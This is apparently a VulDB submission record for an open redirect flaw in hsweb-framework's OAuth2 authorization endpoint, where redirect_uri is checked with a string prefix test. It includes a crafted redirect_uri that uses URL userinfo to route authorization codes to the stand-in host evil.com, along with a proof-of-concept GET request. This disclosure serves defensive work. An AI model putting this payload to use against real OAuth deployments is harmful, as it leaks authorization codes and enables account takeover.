| 标题 | GitHub hsweb-framework 5.0.0 Open Redirect |
|---|
| 描述 | ### Overview
The OAuth2 authorization endpoint validates redirect_uri using a string prefix check:
redirectUri.startsWith(this.redirectUrl)
String redirectUri = param.getOrDefault("redirect_uri", client.getRedirectUrl());
client.validateRedirectUri(redirectUri);
public void validateRedirectUri(String redirectUri) {
if (ObjectUtils.isEmpty(redirectUri) || (!redirectUri.startsWith(this.redirectUrl))) {
throw new OAuth2Exception(ErrorType.ILLEGAL_REDIRECT_URI);
}
}
### Impact
Assume an OAuth2 client has registered the following callback URL:
https://trusted.example.com
An attacker can submit the following redirect_uri:
https://trusted.example.com:[email protected]
This value passes the startsWith("https://trusted.example.com") validation. However, according to URL parsing semantics, the actual destination host is evil.com, while trusted.example.com:password is treated as the URL userinfo component.
An attacker could exploit this behavior to redirect the authorization code to evil.com, creating an authorization code leakage risk.
### Simple Verification
GET /oauth2/authorize?response_type=code&client_id=<clientId>&redirect_uri=https://trusted.example.com:[email protected]/callback&state=audit
The validation passes and returns a URL similar to:
https://trusted.example.com:[email protected]/callback?code=<authorization_code>&state=audit
If the caller proceeds to redirect to this URL, the authorization code will be sent to the attacker-controlled domain evil.com. |
|---|
| 来源 | ⚠️ https://github.com/hs-web/hsweb-framework/issues/354 |
|---|
| 用户 | 0Xrry (UID 86188) |
|---|
| 提交 | 2026-05-20 09時37分 (21 日前) |
|---|
| 管理 | 2026-06-07 11時40分 (18 days later) |
|---|
| 状态 | 已接受 |
|---|
| VulDB条目 | 369097 [hs-web hsweb-framework 直到 5.0.1 OAuth2 Client OAuth2Client.java OAuth2Client Redirect] |
|---|
| 积分 | 20 |
|---|